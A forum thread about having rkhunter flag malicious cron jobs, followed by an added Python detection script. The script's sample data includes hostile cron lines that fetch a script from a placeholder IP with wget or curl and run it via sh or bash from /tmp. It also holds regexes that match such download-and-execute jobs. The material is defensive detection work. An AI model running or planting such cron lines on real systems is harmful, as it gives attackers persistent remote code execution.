It would be nice if rkhunter could scan for nasty jobs in /etc/cron.* and /var/spool/cron/*
We've found nasty stuff in user cronjobs on several occasions. Maybe check for jobs that try to access files like /etc/passwd or jobs that try to run something in /tmp.
We've discussed this between developers but I don't see a check for this coming RSN. What you could do for now is inspect common cron job directories and users' cron spools and then add them to your rkhunter.conf USER_FILEPROP_FILES_DIRS test. At least you will be notified when file contents change, allowing you to inspect them.
RKH works mainly by looking for known rootkit files or suspicious looking files. In only a few tests does it actually look 'in' files. Checking cron jobs would require looking in the files for... what? We could check to see if a known rootkit file was being run, but then RKH should pick that up anyway (because the rootkit file exists).
I think checking for things like accessing /etc/passwd or /tmp could give false positives. It is not unreasonable for a sysadmin to check /etc/passwd with a cron job (given that the file doesn't contain passwords, just account names).
I think we would need a much clearer definition of 'nasty jobs' before trying to implement anything.
I discovered a script that the hacker is executing using a cron job. Can we integrate this script into the rkhunter toolkit check?
If I may interject here: I work for a pretty large hosting company, and on a lot of client servers, typically when an attacker is using cron it is to maintain access, so it would typically be a cron job to download and execute a script. A good way to implement this would be to add in a new config variable for whitelisting things like cPanel's cron jobs and then check for wgets to various domains. Typically the malicious users will have a wget running with * * *
Last edit: Abhilash Mandula 2024-07-13
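The two practical suggestions in this thread, the developer's interim advice to put the cron directories under USER_FILEPROP_FILES_DIRS so rkhunter flags changes, and the hosting-company suggestion of a whitelist plus a check for download-and-execute jobs on an every-minute schedule, can be prototyped together. The script below is an added example written for this page; it is not rkhunter code and rkhunter itself does no such content check. The sample cron files, the whitelist prefixes and the regular expressions are constructed assumptions, and the false-positive concern raised above still applies: a hit is something to inspect, not proof of compromise.

```python
"""Scan cron files for the indicators raised in the thread (download from a
URL, piping into a shell, execution from a temp directory, every-minute
schedule), skip whitelisted jobs, and emit rkhunter.conf
USER_FILEPROP_FILES_DIRS lines covering the scanned directories.

Added example, not rkhunter code. The sample cron content, whitelist and
regexes are constructed assumptions.
"""
import posixpath
import re

# Constructed sample cron files keyed by path (not taken from a real host).
SAMPLE_CRON_FILES = {
    "/var/spool/cron/crontabs/www-data":
        "* * * * * wget -q -O /tmp/.x http://203.0.113.10/x.sh && sh /tmp/.x\n",
    "/var/spool/cron/crontabs/root":
        "# nightly backup\n"
        "0 3 * * * /usr/local/sbin/backup.sh\n",
    "/etc/cron.d/cpanel":
        "SHELL=/bin/bash\n"
        "*/5 * * * * root /usr/local/cpanel/scripts/maintenance\n",
    "/etc/cron.d/updater":
        "@reboot root curl -s http://198.51.100.7/u | bash\n",
}

# Assumed whitelist of trusted command prefixes (e.g. a hosting panel's jobs).
WHITELIST_PREFIXES = ("/usr/local/cpanel/", "/usr/local/sbin/backup.sh")

# System crontabs carry a user field between the schedule and the command.
SYSTEM_CRON_PREFIXES = ("/etc/crontab", "/etc/cron.d/")

DOWNLOADER_RE = re.compile(r"\b(?:wget|curl)\b.*?(?:https?|ftp)://", re.I)
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:/bin/|/usr/bin/)?(?:ba|da|z)?sh\b")
TMP_PATH = r"/(?:tmp|var/tmp|dev/shm)/\S+"
# An interpreter invoked on a file under a temp directory, e.g. "sh /tmp/.x".
TMP_EXEC_RE = re.compile(
    r"(?:^|[\s;&|(])(?:/bin/|/usr/bin/)?(?:sh|bash|perl|python[\w.]*)\s+" + TMP_PATH)


def parse_cron_line(path, line):
    """Return (schedule, command), or None for blank, comment and VAR=value lines."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"^\w+=", line):
        return None
    nfields = 1 if line.startswith("@") else 5      # "@reboot" vs five time fields
    parts = line.split(None, nfields)
    if len(parts) < nfields + 1:
        return None
    schedule, rest = " ".join(parts[:nfields]), parts[nfields]
    if path.startswith(SYSTEM_CRON_PREFIXES):       # drop the user field
        user_cmd = rest.split(None, 1)
        if len(user_cmd) < 2:
            return None
        rest = user_cmd[1]
    return schedule, rest


def suspicious_reasons(schedule, command):
    """List which of the thread's indicators apply to one cron entry."""
    reasons = []
    fields = schedule.split()
    if len(fields) == 5 and all(f in ("*", "*/1") for f in fields):
        reasons.append("runs every minute")
    if DOWNLOADER_RE.search(command):
        reasons.append("downloads from a URL")
    if PIPE_TO_SHELL_RE.search(command):
        reasons.append("pipes into a shell")
    if re.match(TMP_PATH, command) or TMP_EXEC_RE.search(command):
        reasons.append("executes from a temp directory")
    return reasons


def scan_cron_files(files, whitelist=WHITELIST_PREFIXES):
    """files: {path: content}. Returns findings for jobs that are not whitelisted."""
    findings = []
    for path, content in files.items():
        for lineno, raw in enumerate(content.splitlines(), 1):
            parsed = parse_cron_line(path, raw)
            if parsed is None:
                continue
            schedule, command = parsed
            if command.startswith(whitelist):
                continue
            reasons = suspicious_reasons(schedule, command)
            if reasons:
                findings.append({"path": path, "line": lineno, "schedule": schedule,
                                 "command": command, "reasons": reasons})
    return findings


def fileprop_conf_lines(files):
    """rkhunter.conf lines putting every directory holding a scanned file under
    the file-properties check, as the developer reply suggests."""
    dirs = sorted({posixpath.dirname(p) for p in files})
    return ["USER_FILEPROP_FILES_DIRS=" + d for d in dirs]


if __name__ == "__main__":
    for f in scan_cron_files(SAMPLE_CRON_FILES):
        print(f"{f['path']}:{f['line']}: {f['schedule']} {f['command']}")
        print("    " + "; ".join(f["reasons"]))
    print("\n".join(fileprop_conf_lines(SAMPLE_CRON_FILES)))
```

On a real host you would read the files from /etc/crontab, /etc/cron.d and the spool directory instead of the constructed dictionary, and the generated USER_FILEPROP_FILES_DIRS lines go into rkhunter.conf followed by `rkhunter --propupd` so the baseline includes them.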